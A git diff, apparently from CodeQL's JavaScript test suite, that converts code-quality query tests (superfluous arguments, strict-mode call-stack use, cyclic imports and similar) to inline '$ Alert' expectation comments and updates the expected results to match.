92b3fc978773..b88dd7d68e80 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.expected @@ -8,17 +8,17 @@ | reflection.js:7:15:7:18 | 1 | Superfluous arguments passed to $@. | reflection.js:1:1:1:23 | functio ... eturn;} | function f0 | | reflection.js:12:18:12:18 | 2 | Superfluous argument passed to $@. | reflection.js:2:1:2:24 | functio ... eturn;} | function f1 | | thisparameter.ts:4:11:4:12 | 45 | Superfluous argument passed to $@. | thisparameter.ts:1:1:1:45 | functio ... eturn;} | function foo | -| tst.js:11:3:11:5 | g() | Superfluous argument passed to $@. | tst.js:1:1:4:1 | functio ... x+19;\\n} | function f | -| tst.js:33:15:33:18 | 2 | Superfluous arguments passed to $@. | externs.js:34:1:34:27 | functio ... str) {} | function String | -| tst.js:37:4:37:5 | 42 | Superfluous argument passed to $@. | tst.js:38:4:38:23 | function() {return;} | anonymous function | -| tst.js:46:19:46:20 | 10 | Superfluous argument passed to $@. | externs.js:36:1:36:27 | functio ... num) {} | function parseFloat | -| tst.js:70:11:70:12 | 42 | Superfluous argument passed to $@. | tst.js:49:2:51:2 | functio ... urn;\\n\\t} | function nonEmpty | -| tst.js:75:13:75:14 | 42 | Superfluous argument passed to $@. | tst.js:63:19:63:33 | () => undefined | function emptyArrow | -| tst.js:76:31:76:32 | 42 | Superfluous argument passed to $@. | tst.js:64:33:64:32 | () {} | default constructor of class ImplicitEmptyConstructor | -| tst.js:77:31:77:32 | 42 | Superfluous argument passed to $@. | tst.js:67:14:68:3 | (){\\n\\t\\t} | constructor of class ExplicitEmptyConstructor | -| tst.js:78:20:78:21 | 10 | Superfluous argument passed to $@. | externs.js:36:1:36:27 | functio ... num) {} | function parseFloat | -| tst.js:114:20:114:21 | 42 | Superfluous argument passed to $@. | tst.js:82:2:86:2 | functio ... \\n\\t\\t}\\n\\t} | function notAPlainThrower1 | -| tst.js:115:20:115:21 | 42 | Superfluous argument passed to $@. | tst.js:87:2:90:2 | functio ... .");\\n\\t} | function notAPlainThrower2 | -| tst.js:116:20:116:21 | 42 | Superfluous argument passed to $@. | tst.js:91:2:94:2 | functio ... .");\\n\\t} | function notAPlainThrower3 | -| tst.js:120:23:120:24 | 87 | Superfluous argument passed to $@. | tst.js:102:2:104:2 | functio ... (p);\\n\\t} | function throwerWithParam | -| tst.js:121:18:121:19 | 42 | Superfluous argument passed to $@. | tst.js:105:2:113:2 | functio ... )();\\n\\t} | function throwerIndirect | +| tst.js:10:3:10:5 | g() | Superfluous argument passed to $@. | tst.js:1:1:4:1 | functio ... x+19;\\n} | function f | +| tst.js:31:15:31:18 | 2 | Superfluous arguments passed to $@. | externs.js:34:1:34:27 | functio ... str) {} | function String | +| tst.js:34:4:34:5 | 42 | Superfluous argument passed to $@. | tst.js:35:4:35:23 | function() {return;} | anonymous function | +| tst.js:43:19:43:20 | 10 | Superfluous argument passed to $@. | externs.js:36:1:36:27 | functio ... num) {} | function parseFloat | +| tst.js:67:11:67:12 | 42 | Superfluous argument passed to $@. | tst.js:46:2:48:2 | functio ... urn;\\n\\t} | function nonEmpty | +| tst.js:72:13:72:14 | 42 | Superfluous argument passed to $@. | tst.js:60:19:60:33 | () => undefined | function emptyArrow | +| tst.js:73:31:73:32 | 42 | Superfluous argument passed to $@. | tst.js:61:33:61:32 | () {} | default constructor of class ImplicitEmptyConstructor | +| tst.js:74:31:74:32 | 42 | Superfluous argument passed to $@. | tst.js:64:14:65:3 | (){\\n\\t\\t} | constructor of class ExplicitEmptyConstructor | +| tst.js:75:20:75:21 | 10 | Superfluous argument passed to $@. | externs.js:36:1:36:27 | functio ... num) {} | function parseFloat | +| tst.js:111:20:111:21 | 42 | Superfluous argument passed to $@. | tst.js:79:2:83:2 | functio ... \\n\\t\\t}\\n\\t} | function notAPlainThrower1 | +| tst.js:112:20:112:21 | 42 | Superfluous argument passed to $@. | tst.js:84:2:87:2 | functio ... .");\\n\\t} | function notAPlainThrower2 | +| tst.js:113:20:113:21 | 42 | Superfluous argument passed to $@. | tst.js:88:2:91:2 | functio ... .");\\n\\t} | function notAPlainThrower3 | +| tst.js:117:23:117:24 | 87 | Superfluous argument passed to $@. | tst.js:99:2:101:2 | functio ... (p);\\n\\t} | function throwerWithParam | +| tst.js:118:18:118:19 | 42 | Superfluous argument passed to $@. | tst.js:102:2:110:2 | functio ... )();\\n\\t} | function throwerIndirect | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.qlref b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.qlref index f148cdba2ece..2c48d9faefb0 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.qlref @@ -1 +1,2 @@ -LanguageFeatures/SpuriousArguments.ql \ No newline at end of file +query: LanguageFeatures/SpuriousArguments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/es2015.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/es2015.js index 928edcd7fd3e..07f4446800b0 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/es2015.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/es2015.js @@ -1,7 +1,7 @@ class Class1 { constructor(x) { this.x = x; } } -new Class1(42, 23); // NOT OK: `23` is ignored +new Class1(42, 23); // $ Alert - `23` is ignored class Sup { constructor(x) { this.x = x; } @@ -10,12 +10,12 @@ class Sup { class Sub extends Sup { } -new Sub(42); // OK: synthetic constructor delegates to super constructor +new Sub(42); // OK - synthetic constructor delegates to super constructor class Other {} -new Other(42); // NOT OK: `42` is ignored +new Other(42); // $ Alert - `42` is ignored var args = []; -f(...args); // OK -f(42, ...args); // NOT OK \ No newline at end of file +f(...args); +f(42, ...args); // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/globals.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/globals.js index 3771a18ed876..e41ddd2d0136 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/globals.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/globals.js @@ -4,7 +4,7 @@ function global() {return;} window.global = function (x) {return;}; })(this); -global(x); // OK: might refer to function on line 4 +global(x); // OK - might refer to function on line 4 function otherglobal() {return;} @@ -12,6 +12,6 @@ var o = { otherglobal: function (x) {return;} }; -otherglobal(x); // NOT OK: can never refer to function on line 12 -otherglobal.call(null, x); // NOT OK -otherglobal.call(null, x, y); // NOT OK +otherglobal(x); // $ Alert - can never refer to function on line 12 +otherglobal.call(null, x); // $ Alert +otherglobal.call(null, x, y); // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/reflection.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/reflection.js index 22c8c3b537e7..ac2df0dafdce 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/reflection.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/reflection.js @@ -3,13 +3,13 @@ function f1(x) {return;} f0.call(); f0.call(this); -f0.call(this, 1); -f0.call(this, 1, 2); +f0.call(this, 1); // $ Alert +f0.call(this, 1, 2); // $ Alert f1.call(); f1.call(this); f1.call(this, 1); -f1.call(this, 1, 2); +f1.call(this, 1, 2); // $ Alert f0.apply(); f0.apply(this); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/thisparameter.ts b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/thisparameter.ts index d166c957858e..d17b5d33459f 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/thisparameter.ts +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/thisparameter.ts @@ -1,4 +1,4 @@ function foo(this: void, x: number) {return;} -foo(45); // OK -foo(null, 45); // NOT OK +foo(45); +foo(null, 45); // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js index 1caa88564a1a..387348232e3d 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js @@ -7,8 +7,7 @@ function g() { return 23; } -// NOT OK -f(g()); +f(g()); // $ Alert function sum() { var result = 0; @@ -17,33 +16,31 @@ function sum() { return result; } -// OK + sum(1, 2, 3); function h(k) { k = k || function() {}; - // OK + k(42); } -// OK + new Array(1, 2, 3); -// NOT OK -new String(1, 2, 3); +new String(1, 2, 3); // $ Alert (function(f) { - // NOT OK - f(42); + f(42); // $ Alert })(function() {return;}); (function h(f) { - // OK + f(42); h(function(x) { return x; }); })(function() {}); -parseFloat("123", 10); +parseFloat("123", 10); // $ Alert - unlike parseInt this does not take a radix (function testWhitelistEmptyFunctions(){ function nonEmpty(){ @@ -67,15 +64,15 @@ parseFloat("123", 10); constructor(){ } } - nonEmpty(42); // NOT OK - empty(42); // OK - emptyWithParam(42, 87); // OK - commentedEmpty(42); // OK - commentedEmptyWithSpreadParam(42, 87); // OK - emptyArrow(42); // NOT OK - new ImplicitEmptyConstructor(42); // NOT OK - new ExplicitEmptyConstructor(42); // NOT OK - parseFloat("123", 10); // NOT OK + nonEmpty(42); // $ Alert + empty(42); + emptyWithParam(42, 87); + commentedEmpty(42); + commentedEmptyWithSpreadParam(42, 87); + emptyArrow(42); // $ Alert + new ImplicitEmptyConstructor(42); // $ Alert + new ExplicitEmptyConstructor(42); // $ Alert + parseFloat("123", 10); // $ Alert }); (function testWhitelistThrowingFunctions() { @@ -111,14 +108,14 @@ parseFloat("123", 10); } })(); } - notAPlainThrower1(42); // NOT OK - notAPlainThrower2(42); // NOT OK - notAPlainThrower3(42); // NOT OK - thrower(42); // OK - throwerArrow(42); // OK - throwerCustom(42); // OK - throwerWithParam(42, 87); // NOT OK - throwerIndirect(42); // OK, but still flagged due to complexity + notAPlainThrower1(42); // $ Alert + notAPlainThrower2(42); // $ Alert + notAPlainThrower3(42); // $ Alert + thrower(42); + throwerArrow(42); + throwerCustom(42); + throwerWithParam(42, 87); // $ Alert + throwerIndirect(42); // $ SPURIOUS: Alert - flagged due to complexity }); function sum2() { @@ -128,14 +125,14 @@ function sum2() { return result; } -// OK + sum2(1, 2, 3); const $ = function (x, arr) { console.log(x, arr); }; -// OK + async function tagThing(repoUrl, directory) { await $`git clone ${repoUrl} ${directory}`; } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.expected b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.expected index 967ac1ce58f3..7141c9d5589e 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.expected @@ -1,7 +1,7 @@ -| tst.js:5:30:5:45 | arguments.callee | Strict mode code cannot use arguments.callee. | -| tst.js:7:21:7:36 | arguments.callee | Strict mode code cannot use arguments.callee. | -| tst.js:9:20:9:27 | f.caller | Strict mode code cannot use Function.prototype.caller. | -| tst.js:11:17:11:27 | f.arguments | Strict mode code cannot use Function.prototype.arguments. | -| tst.js:18:10:18:25 | arguments.callee | Strict mode code cannot use arguments.callee. | -| tst.js:31:12:31:21 | foo.caller | Strict mode code cannot use Function.prototype.caller. | -| tst.js:31:12:31:21 | foo.caller | Strict mode code cannot use arguments.caller. | +| tst.js:4:30:4:45 | arguments.callee | Strict mode code cannot use arguments.callee. | +| tst.js:5:21:5:36 | arguments.callee | Strict mode code cannot use arguments.callee. | +| tst.js:6:20:6:27 | f.caller | Strict mode code cannot use Function.prototype.caller. | +| tst.js:7:17:7:27 | f.arguments | Strict mode code cannot use Function.prototype.arguments. | +| tst.js:13:10:13:25 | arguments.callee | Strict mode code cannot use arguments.callee. | +| tst.js:25:12:25:21 | foo.caller | Strict mode code cannot use Function.prototype.caller. | +| tst.js:25:12:25:21 | foo.caller | Strict mode code cannot use arguments.caller. | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.qlref b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.qlref index d093603e0779..92a121e2099c 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.qlref @@ -1 +1,2 @@ -LanguageFeatures/StrictModeCallStackIntrospection.ql \ No newline at end of file +query: LanguageFeatures/StrictModeCallStackIntrospection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/tst.js index 583daac6ccca..6965cab8bae0 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/tst.js @@ -1,25 +1,20 @@ var o = { A: function f(x) { 'use strict'; - // BAD - if (!(this instanceof arguments.callee)) - // BAD - return new arguments.callee(x); - // BAD - console.log(f.caller); - // BAD - this.y = f.arguments; + if (!(this instanceof arguments.callee)) // $ Alert + return new arguments.callee(x); // $ Alert + console.log(f.caller); // $ Alert + this.y = f.arguments; // $ Alert this.x = x; } }; var D = class extends function() { - // BAD - return arguments.callee; + return arguments.callee; // $ Alert } {}; function g() { - // OK + return arguments.caller.length; } @@ -27,8 +22,7 @@ function g() { 'use strict'; function h() { var foo = Math.random() > 0.5 ? h : arguments; - // BAD - return foo.caller; + return foo.caller; // $ Alert } })(); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/SyntaxError.qlref b/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/SyntaxError.qlref index 33bc1d9e3b45..4133f6e98314 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/SyntaxError.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/SyntaxError.qlref @@ -1 +1 @@ -LanguageFeatures/SyntaxError.ql +query: LanguageFeatures/SyntaxError.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/arrows.js b/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/arrows.js index 62468802e464..ce50894cacea 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/arrows.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/arrows.js @@ -1 +1 @@ -(a, a) => a + a; +(a, a) => a + a; // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/destructingPrivate.js b/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/destructingPrivate.js index 060111d86b46..4edd6cb2d6f9 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/destructingPrivate.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/destructingPrivate.js @@ -1,6 +1,6 @@ class C { #privDecl; bar() { - {#privDecl} = this; + {#privDecl} = this; // $ Alert } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/tst.js index e7aaa89f128a..62acf99f0477 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/tst.js @@ -1,2 +1,2 @@ function findBox() { - return $("box.important + return $("box.important // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.js b/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.js index 65a61da7a616..d21a662dc5e8 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.js @@ -2,7 +2,7 @@ function connectAndLog(id) { log.info(`Connecting to ${id}`) let connection = openConnection(id) if (!connection) { - log.error('Could not connect to ${id}') + log.error('Could not connect to ${id}') // $ Alert } } @@ -14,9 +14,9 @@ function emitTemplate(name, date) { var globalVar = "global"; function foo() { - log.error('globalVar = ${globalVar}'); + log.error('globalVar = ${globalVar}'); // $ Alert } -log.error('globalVar = ${globalVar}'); +log.error('globalVar = ${globalVar}'); // $ Alert function bar() { log.error('Something ${notInScope}'); @@ -25,7 +25,7 @@ function bar() { function baz(x){ log.error("${x}"); log.error("${y}"); - log.error("${x} "); + log.error("${x} "); // $ Alert log.error("${y} "); } @@ -37,7 +37,7 @@ function foo1() { const foobar = 4; const data = {name: name, date: date}; - writer.emit("Name: ${name}, Date: ${date}.", data); // OK + writer.emit("Name: ${name}, Date: ${date}.", data); - writer.emit("Name: ${name}, Date: ${date}, ${foobar}", data); // NOT OK - `foobar` is not in `data`. + writer.emit("Name: ${name}, Date: ${date}, ${foobar}", data); // $ Alert - `foobar` is not in `data`. } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.qlref b/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.qlref index 372cdfd68f5d..6eb187fa573a 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.qlref @@ -1 +1,2 @@ -LanguageFeatures/TemplateSyntaxInStringLiteral.ql +query: LanguageFeatures/TemplateSyntaxInStringLiteral.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/ThisBeforeSuper.expected b/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/ThisBeforeSuper.expected index e4a1e1a53dff..dbc274d613c1 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/ThisBeforeSuper.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/ThisBeforeSuper.expected @@ -10,5 +10,5 @@ | invalid.js:14:35:14:118 | () { cl ... er(); } | The super constructor must be called before using $@. | invalid.js:14:99:14:102 | this | this | | invalid.js:15:71:15:95 | () { th ... er(); } | The super constructor must be called before using $@. | invalid.js:15:76:15:79 | this | this | | invalid.js:16:35:16:66 | () { if ... .a(); } | The super constructor must be called before using $@. | invalid.js:16:56:16:59 | this | this | -| invalid.js:26:16:26:19 | () {\\n ... ;\\n } | The super constructor must be called before using $@. | invalid.js:27:9:27:12 | this | this | -| invalid.js:26:16:26:19 | () {\\n ... ;\\n } | The super constructor must be called before using $@. | invalid.js:28:9:28:12 | this | this | +| invalid.js:26:16:26:30 | () { // ... ;\\n } | The super constructor must be called before using $@. | invalid.js:27:9:27:12 | this | this | +| invalid.js:26:16:26:30 | () { // ... ;\\n } | The super constructor must be called before using $@. | invalid.js:28:9:28:12 | this | this | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/ThisBeforeSuper.qlref b/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/ThisBeforeSuper.qlref index f755c5a9d472..0d3e717fe79a 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/ThisBeforeSuper.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/ThisBeforeSuper.qlref @@ -1 +1,2 @@ -LanguageFeatures/ThisBeforeSuper.ql \ No newline at end of file +query: LanguageFeatures/ThisBeforeSuper.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/invalid.js b/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/invalid.js index 82e7f8cda77e..c70e2cdcf7f1 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/invalid.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/invalid.js @@ -2,18 +2,18 @@ // under the MIT license; see file LICENSE. class B1 {} -class A30 extends B1 { constructor() { this.c = 0; } } -class A31 extends B1 { constructor() { this.c(); } } -class A32 extends B1 { constructor() { super.c(); } } -class A33 extends B1 { constructor() { this.c = 0; super(); } } -class A34 extends B1 { constructor() { this.c(); super(); } } -class A35 extends B1 { constructor() { super.c(); super(); } } -class A36 extends B1 { constructor() { super(this.c); } } -class A37 extends B1 { constructor() { super(this.c()); } } -class A38 extends B1 { constructor() { super(super.c()); } } -class A39 extends B1 { constructor() { class C extends D { constructor() { super(); this.e(); } } this.f(); super(); } } -class A40 extends B1 { constructor() { class C extends D { constructor() { this.e(); super(); } } super(); this.f(); } } -class A41 extends B1 { constructor() { if (a) super(); this.a(); } } +class A30 extends B1 { constructor() { this.c = 0; } } // $ Alert +class A31 extends B1 { constructor() { this.c(); } } // $ Alert +class A32 extends B1 { constructor() { super.c(); } } // $ Alert +class A33 extends B1 { constructor() { this.c = 0; super(); } } // $ Alert +class A34 extends B1 { constructor() { this.c(); super(); } } // $ Alert +class A35 extends B1 { constructor() { super.c(); super(); } } // $ Alert +class A36 extends B1 { constructor() { super(this.c); } } // $ Alert +class A37 extends B1 { constructor() { super(this.c()); } } // $ Alert +class A38 extends B1 { constructor() { super(super.c()); } } // $ Alert +class A39 extends B1 { constructor() { class C extends D { constructor() { super(); this.e(); } } this.f(); super(); } } // $ Alert +class A40 extends B1 { constructor() { class C extends D { constructor() { this.e(); super(); } } super(); this.f(); } } // $ Alert +class A41 extends B1 { constructor() { if (a) super(); this.a(); } } // $ Alert // the following two cases are not currently detected (even though they should be): // while `this` is, in both cases, guarded by a `super` call, the call does not complete @@ -23,7 +23,7 @@ class A42 extends B2 { constructor() { try { super(); } finally { this.a; } } } class A43 extends B2 { constructor() { try { super(); } catch (err) { } this.a; } } class A44 extends B1 { - constructor() { + constructor() { // $ Alert this.p1 = 0; this.p2 = 0; } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/UnusedIndexVariable/UnusedIndexVariable.js b/javascript/ql/test/query-tests/LanguageFeatures/UnusedIndexVariable/UnusedIndexVariable.js index 7f6071b86963..7d139a4d582c 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/UnusedIndexVariable/UnusedIndexVariable.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/UnusedIndexVariable/UnusedIndexVariable.js @@ -1,6 +1,6 @@ function sum(xs) { var res = 0; - for(var i=0; i | | +| selfimport.js:1:1:1:23 | require ... mport') | Module selfimport directly imports itself. | selfimport.js:1:1:1:35 | | | | test1/a.js:1:1:1:27 | require ... ner/a') | Module /test1/a.js imports module .../inner/a.js, which in turn $@ it. | test2/inner/a.js:1:1:1:24 | require ... st1/a') | imports | | test1/a.js:2:1:2:14 | require('./b') | Module a imports module b, which in turn $@ it. | test1/b.js:1:1:1:27 | require ... ner/a') | indirectly imports | | test1/b.js:1:1:1:27 | require ... ner/a') | Module b imports module a, which in turn $@ it. | test2/inner/a.js:1:1:1:24 | require ... st1/a') | indirectly imports | diff --git a/javascript/ql/test/query-tests/NodeJS/CyclicImport/CyclicImport.qlref b/javascript/ql/test/query-tests/NodeJS/CyclicImport/CyclicImport.qlref index 944a1f16d023..2f1ba00da9b5 100644 --- a/javascript/ql/test/query-tests/NodeJS/CyclicImport/CyclicImport.qlref +++ b/javascript/ql/test/query-tests/NodeJS/CyclicImport/CyclicImport.qlref @@ -1 +1,2 @@ -NodeJS/CyclicImport.ql \ No newline at end of file +query: NodeJS/CyclicImport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/NodeJS/CyclicImport/a.js b/javascript/ql/test/query-tests/NodeJS/CyclicImport/a.js index 6e20c34bb2ae..e435ffdd6e61 100644 --- a/javascript/ql/test/query-tests/NodeJS/CyclicImport/a.js +++ b/javascript/ql/test/query-tests/NodeJS/CyclicImport/a.js @@ -1,7 +1,7 @@ // Adapted from the Node.js documentation console.log('a starting'); exports.done = false; -var b = require('./b.js'); +var b = require('./b.js'); // $ Alert console.log('in a, b.done = %j', b.done); exports.done = true; console.log('a done'); diff --git a/javascript/ql/test/query-tests/NodeJS/CyclicImport/b.js b/javascript/ql/test/query-tests/NodeJS/CyclicImport/b.js index 48d00da05eec..b8b1b26c76a8 100644 --- a/javascript/ql/test/query-tests/NodeJS/CyclicImport/b.js +++ b/javascript/ql/test/query-tests/NodeJS/CyclicImport/b.js @@ -1,7 +1,7 @@ // Adapted from the Node.js documentation console.log('b starting'); exports.done = false; -var a = require('./a.js'); +var a = require('./a.js'); // $ Alert console.log('in b, a.done = %j', a.done); exports.done = true; console.log('b done'); diff --git a/javascript/ql/test/query-tests/NodeJS/CyclicImport/selfimport.js b/javascript/ql/test/query-tests/NodeJS/CyclicImport/selfimport.js index 524cd7785c61..015dd055baa7 100644 --- a/javascript/ql/test/query-tests/NodeJS/CyclicImport/selfimport.js +++ b/javascript/ql/test/query-tests/NodeJS/CyclicImport/selfimport.js @@ -1 +1 @@ -require('./selfimport'); \ No newline at end of file +require('./selfimport'); // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/NodeJS/CyclicImport/test1/a.js b/javascript/ql/test/query-tests/NodeJS/CyclicImport/test1/a.js index c50b18df78a5..19e985960836 100644 --- a/javascript/ql/test/query-tests/NodeJS/CyclicImport/test1/a.js +++ b/javascript/ql/test/query-tests/NodeJS/CyclicImport/test1/a.js @@ -1,2 +1,2 @@ -require('../test2/inner/a'); -require('./b'); \ No newline at end of file +require('../test2/inner/a'); // $ Alert +require('./b'); // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/NodeJS/CyclicImport/test1/b.js b/javascript/ql/test/query-tests/NodeJS/CyclicImport/test1/b.js index 4dad3ca3b97f..c1527dc042ca 100644 --- a/javascript/ql/test/query-tests/NodeJS/CyclicImport/test1/b.js +++ b/javascript/ql/test/query-tests/NodeJS/CyclicImport/test1/b.js @@ -1 +1 @@ -require('../test2/inner/a'); \ No newline at end of file +require('../test2/inner/a'); // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/NodeJS/CyclicImport/test2/inner/a.js b/javascript/ql/test/query-tests/NodeJS/CyclicImport/test2/inner/a.js index c96937e40a33..cc49a519bc0d 100644 --- a/javascript/ql/test/query-tests/NodeJS/CyclicImport/test2/inner/a.js +++ b/javascript/ql/test/query-tests/NodeJS/CyclicImport/test2/inner/a.js @@ -1 +1 @@ -require('../../test1/a'); \ No newline at end of file +require('../../test1/a'); // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/NodeJS/DubiousImport/DubiousImport.qlref b/javascript/ql/test/query-tests/NodeJS/DubiousImport/DubiousImport.qlref index 6b556de9f00b..c6005b442606 100644 --- a/javascript/ql/test/query-tests/NodeJS/DubiousImport/DubiousImport.qlref +++ b/javascript/ql/test/query-tests/NodeJS/DubiousImport/DubiousImport.qlref @@ -1 +1,2 @@ -NodeJS/DubiousImport.ql \ No newline at end of file +query: NodeJS/DubiousImport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/NodeJS/DubiousImport/a.js b/javascript/ql/test/query-tests/NodeJS/DubiousImport/a.js index 2c75ba0124ff..c0c95c0d5f67 100644 --- a/javascript/ql/test/query-tests/NodeJS/DubiousImport/a.js +++ b/javascript/ql/test/query-tests/NodeJS/DubiousImport/a.js @@ -1,4 +1,4 @@ -var foo = require('./b').foo, +var foo = require('./b').foo, // $ Alert bar = require('./c').bar, sneaky = require('./d').sneaky; diff --git a/javascript/ql/test/query-tests/NodeJS/DubiousImport/main.js b/javascript/ql/test/query-tests/NodeJS/DubiousImport/main.js index b4645ff98881..6f2bd18a9127 100644 --- a/javascript/ql/test/query-tests/NodeJS/DubiousImport/main.js +++ b/javascript/ql/test/query-tests/NodeJS/DubiousImport/main.js @@ -2,7 +2,7 @@ var b = require('./b'), c = require('./c'), d = require('./d'); -b.foo; +b.foo; // $ Alert c.bar; d.sneaky; b.prototype; @@ -12,7 +12,7 @@ require('./f').tricky; var fs = require('fs'); fs.rename('foo', 'bar', function() {}); -fs.renmae('foo', 'bar', function() {}); +fs.renmae('foo', 'bar', function() {}); // $ Alert fs.move('foo', 'bar', function() {}); var k = require('./k'); @@ -20,7 +20,7 @@ k.foo; var l = require('./l'); l.foo(); -l.bar(); // not OK +l.bar(); // $ Alert require('./m').foo; diff --git a/javascript/ql/test/query-tests/NodeJS/DubiousImport/multi_import.js b/javascript/ql/test/query-tests/NodeJS/DubiousImport/multi_import.js index cacb69772fe9..7eb45e2cfabb 100644 --- a/javascript/ql/test/query-tests/NodeJS/DubiousImport/multi_import.js +++ 